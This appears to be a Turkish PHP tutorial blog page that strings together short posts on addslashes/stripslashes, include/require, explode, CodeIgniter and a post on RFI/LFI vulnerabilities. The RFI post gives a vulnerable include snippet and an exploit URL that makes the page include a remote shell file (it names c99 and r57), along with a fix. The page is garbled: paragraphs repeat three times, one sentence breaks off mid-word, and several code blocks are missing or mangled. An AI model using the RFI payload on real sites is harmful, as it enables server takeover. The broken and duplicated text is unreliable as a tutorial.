Veritabanında problem çıkmaması için tırnak işareleri önüne addslashes() fonksiyonu ile “/” slaş ekledik. Peki bunları sayfamızda gösterirken slaşlı mı göstereceğiz ? Bu kötü bir görüntü oluşturmaz mı
Veritabanı kayıt işlemlerinde tek tırnak ve çift tırnaklardan kaynaklı problemler yaşamamak için addslashes() ve stripslashes() fonksiyonlarını kullanıyoruz. addslashes() fonksiyonunu bilmeyenlerin öncelikle şurayı okumaları gerekmektedir.
Veritabanında problem çıkmaması için tırnak işareleri önüne addslashes() fonksiyonu ile “/” slaş ekledik. Peki bunları sayfamızda gösterirken slaşlı mı göstereceğiz ? Bu kötü bir görüntü oluşturmaz mı ?
Kötü görüntü olmasını istemeyiz elbet. O halde tırnak işaretlerinden önceki slaşları kaldırmamız gerekecek. Bunun için veritabanının ilgili alanından çektiğimiz veriyi stripslashes() fonksiyonu ile süzmemiz gerekmektedir. Bu fonksiyon ile tırnak işaretleri önünde ki kaçış slaşları temizlenmiş olur.
Aşağıda ki örnekte bunu daha iyi anlayabilirsiniz.

Php ile linkinizi Gizleyin

Elimizde 3 Adet sayfa olduğunu düşünelim
Mesela İletisim.php, Hakkimizda.php, Urunler.php
Şimdi bunların Linklerini gizleyelim tek sayfa gibi algılanmasını sağlayalım
Php Kodu:

Php Dilinin Yapısı

PHP, HTML gömülü bir dildir. Yani aynı dosya içinde hem HTML, hem de PHP kodu kullanılabilmektedir. Kod içinde HTML’den PHP’ye geçmek için bazı ayıraçlar kullanılması gerekir. Örneğin:

< TABLE SIZE=”500″ >
< TR >
< TD >< ? Buraya PHP kodu yazılacak ?> < TD >

>
HTML taglari içinde de PHP kullanmak için şu metod seçilmeli:
< TABLE SIZE=”< ? php Buraha PHP kodu yazılacak ? >” …
Sayfaya Yazı Yazdırma:
< ? php echo”Merhaba Uzaylı”; ? >
Bu kodu tarayıcımız bize: ‘Merhaba Uzaylı’ şeklinde gösterecektir.

Noktala İşaretlerine Kontrol Eden Php Kodumuz

oktalama hatalarını bir nebzede düzeltebilen nacizade bir fonksiyon:
Düzeltebildiği hatalar:
1. Noktalama işaretlerinin bir önceki kelimeye bitişik yazılmaması.
2. Noktalama işaretlerinden sonra bir boşluk bırakılmaması.
3. Üç nokta yerine 4, 5 ya da daha fazla nokta konulması.
4. Metnin en sonunda üç nokta kullanılması.
5. Metnin içinde herhangi bir yerde birden fazla boşluk bırakılması.
6. Paragraflar arası boşluk bırakmak için boş satırlar bırakılması.
7. Noktadan sonra cümleye küçük harfle başlanması.
PHP- Kodu:

İşte CodeIgniter PHP

\
Ateş Seni Çağırıyor !
Code Igniter Nedir?
Code Igniter, web sitelerini PHP kullanarak yazan kişiler için yeni bir araçtır. Sizi spagetti kodlarla boğuşmaktan kurtarıp daha basit ve daha temiz kod yazmanızı sağlar. Böylece projelerinizi her zamankinden daha kısa bir sürede tamamlayabilirsiniz.
Code Igniter kimler içindir?
1. Devasa olmayan küçük ve hızlı bir uygulama çatısı isteyenler için
2. PEAR gibi kütüphaneleri ilginç bulmayanlar için
3. Çok az bir konfigürasyon değişikliği gerektiren bir çatı isteyenler için
4. Komut satırı gerektirmeyen bir çatı isteyenler için
5. Karmaşık, birbiri içerisine geçmiş kodlar istemeyenler için (spagetti kod)
6. PHP’nin farklı sürümlerinde ve yapılandırmalarında sorunsuz çalışan yüksek uyumluklu bir çatı isteyenler için

PHP’de RFI/LFI Açıkları ve Korunmak İçin Yapılması Gerekenler

*Remote File İnclude: Uzaktan Dosya Dahil Etme anlamına gelmektedir.
*Local File İnclude: ise Aynı serverdan dosya dahil etme anlamına gelmektedir…
include / include_once : Bu kodla uzaktan dosya dahil edilir.Uzun satırlar alan kodlar bu komutla başka sayfada kodlanmış olarak gösterilerek tek satıra indirgenir…

require / require_once :
Bu kod da aynı include kodunun yaptığı işi yapar,fakat include ile kodlanmış bi sayfada çağrılan(dahil edilen) dosya bulunamazsa php yorumlayıcımız bu kodun olduğu satırı hata mesajı göndererek atlar ve sayfanın diğer kalan kodlarını yorumlamaya devam eder fakat include komutundan sonra require komutu da kullanılmışsa; çağırılan dosya bulunamadığı taktirde bir hata verir ve yorumlamayı durdurur. require in include den farkı budur. Yine de RFI/LFI açığı bulurken require ile include aynı derecede işimize yarar(ilerde görücez).
variable : Değişken anlamına gelmektedir.Bizim açığımız da bu kodlamadan kaynaklanmaktadır. Yani örneğin ; include ile bi dosya, sayfaya dahil edilirken komutun içinde değişkenler de bulunur (örnek bi değişken : $external). Bu değişken aynı sayfada define edilmezse yani
*Remote File İnclude: Uzaktan Dosya Dahil Etme anlamına gelmektedir.
*Local File İnclude: ise Aynı serverdan dosya dahil etme anlamına gelmektedir…
include / include_once : Bu kodla uzaktan dosya dahil edilir.Uzun satırlar alan kodlar bu komutla başka sayfada kodlanmış olarak gösterilerek tek satıra indirgenir…

require / require_once :
Bu kod da aynı include kodunun yaptığı işi yapar,fakat include ile kodlanmış bi sayfada çağrılan(dahil edilen) dosya bulunamazsa php yorumlayıcımız bu kodun olduğu satırı hata mesajı göndererek atlar ve sayfanın diğer kalan kodlarını yorumlamaya devam eder fakat include komutundan sonra require komutu da kullanılmışsa; çağırılan dosya bulunamadığı taktirde bir hata verir ve yorumlamayı durdurur. require in include den farkı budur. Yine de RFI/LFI açığı bulurken require ile include aynı derecede işimize yarar(ilerde görücez).
variable : Değişken anlamına gelmektedir.Bizim açığımız da bu kodlamadan kaynaklanmaktadır. Yani örneğin ; include ile bi dosya, sayfaya dahil edilirken komutun içinde değişkenler de bulunur (örnek bi değişken : $external). Bu değişken aynı sayfada define edilmezse yani tanımlanmazsa burda bu açık kullanılabilir…
Remote File İnclude (RFI)
Uzaktan dosya dahil etme anlama gelen RFI da tanımlanmamış değişkenler tanımlanır ve açık varsa istenilen değere atanır… örneğin ; shell(c99,r57 vs… ).

include ($external. ’../function.php’) ;
?>
Bu Kodu,
Vermiş olduğum bu kodu x.php olarak kaydedip php destekleyen bi hosta atın ve çalıştırın.Bu sayfayı çalıştıdığınızda bi hata alıcaksınız.Bu hata dahil ettiğimiz function.php dosyasının bulunamamasından kaynaklanmaktadır,bu bizi ilgilendirmiyor.
www.site.com/x.php?external=http://www.sitemiz.com/shell.php?
Açık yukarıdaki gibi kullanılabilir.Engellemek için :

$external= ’data’;
include ($external. ’../function.php’);
?>
Vermiş olduğum bu kodu da x2.php olarak kaydedip hostunuza atın ve yine bu sayfayı açtığınız zaman tekrar function.php dosyasının b
*Remote File İnclude: Uzaktan Dosya Dahil Etme anlamına gelmektedir.
*Local File İnclude: ise Aynı serverdan dosya dahil etme anlamına gelmektedir…
include / include_once : Bu kodla uzaktan dosya dahil edilir.Uzun satırlar alan kodlar bu komutla başka sayfada kodlanmış olarak gösterilerek tek satıra indirgenir…

require / require_once :
Bu kod da aynı include kodunun yaptığı işi yapar,fakat include ile kodlanmış bi sayfada çağrılan(dahil edilen) dosya bulunamazsa php yorumlayıcımız bu kodun olduğu satırı hata mesajı göndererek atlar ve sayfanın diğer kalan kodlarını yorumlamaya devam eder fakat include komutundan sonra require komutu da kullanılmışsa; çağırılan dosya bulunamadığı taktirde bir hata verir ve yorumlamayı durdurur. require in include den farkı budur. Yine de RFI/LFI açığı bulurken require ile include aynı derecede işimize yarar(ilerde görücez).

İnclude Ve Require Fonksiyonu’nun Kullanımı

Arkadaşlar aslında bu fonksiyonların kullanım alanları ve görevli aynı diyebiliriz. Fakat gerçekten büyük projelerde dikkat edilmesi gereken bir konu olduğunu söyleyebiliriz. O zaman başlayalım anlatmaya. İlk önce farklarına değinmek istiyorum.
İnclude() fonksiyonun’da eğer include edilen dosya’da hata varsa , fonksiyonun bulunduğu sayfa görüntülenir fakat include edilen yerde bir hata mesajı verilir.
Require() fonksiyonuna gelirsek Require edilen dosyada hata varsa o hata bütün sayfayı kapatır.
Yorumum doğru olur mu bilmem ama İnclude ile dosyanın alındığına dair bir bilgi alıyor programımız. Require’de ise oraya sanki diğer sayfadaki kodu koymuşuz gibi oluyor.Arkadaşlar aslında bu fonksiyonların kullanım alanları ve görevli aynı diyebiliriz. Fakat gerçekten büyük projelerde dikkat edilmesi gereken bir konu olduğunu söyleyebiliriz. O zaman başlayalım anlatmaya. İlk önce farklarına değinmek istiyorum.

Explode Fonskiyonunun Kullanımı

Explode fonksiyonu ortaya güzel şeyler çıkartmak istediğimizde bize çok lazım olacak bir fonskiyondur. Explode‘nin Türkçe’si derseniz bir çok kullanımı vardır. Mesela ; patlat,böl,kır… gibi.
Kullanmamız gereken yerleri söylemek gerekirse bir kaçnını numaralı olarak sıralıyayım.(Örnek vererek .)
  1. Mesela bir dosya uzantısını bulmak istiyoruz. Dosya ismi topmails.zip olsun. Bu dosyayının uzantısı .zip‘tir. Peki bunu programımıza nasıl söyleyeceğiz.Explode fonskiyonu ile dosya ismini ‘.’-’nokta‘ olan yerlerden patlatıyor yani bölüyoruz. Daha sonra patlattığımız zaman bizim elimizde 1.sırada ‘topmails’ 2.sırada ‘zip’ kalacaktır. Biz bunu array yani dizi ‘ye atacağız. Daha sonra bu dizinin son elemanı bize dosya uzantısını verir! Bunu kod olarak dökelim!
$dosyaismi   =   ‘topmails.zip’;
$patlat      =   explode(“.”,$dosyaismi);
echo $patlat[count($patlat)-1];
?>
Sonuç bize ‘.zip’ olarak dönecektir. Burada metnimizi explode ile ‘nokta‘ ‘.’  kısmından patlattık. Daha sonra explode fonksiyonumuz bunu dizi yani array olarak kaydettiği için count fonksiyonu ile dizimizi saydırdık ve bir eksilterek son elemanı bulduk. Tabiiki bir dosyanın en son ‘.’ kısmından sonraki metin’de bizim uzantımız olduğu için , bu kod parçası bize uzantı bulmada yarıyacaktır.
Bunu bir upload scriptin’de çok rahat bir şekilde kullanabilirsiniz!
Daha ayrıntılı bilgi için tıklayın. Eğer bundan’da anlamadıysanız videolu anlatımı inceleyebilirsiniz!

Php’de İf ifadesinin kullanımı

Doğrusunu söylemek gerekirse php web tabanlı uygulama yazmada şuanda en fazla kullanılan dil halinde. Bence bilgisayar başında hem zevkli vakitler geçirmek adına hemde iş yapmak adına gerçekten bize güzel imkanlar sunuyor.
Tabii bunda büyük rol oynayan devasa kılavız. php manual
İlk önce bana kalırsa en fazla kullanılan fonksiyondan başlayalım!
İfElseElseif
ebook library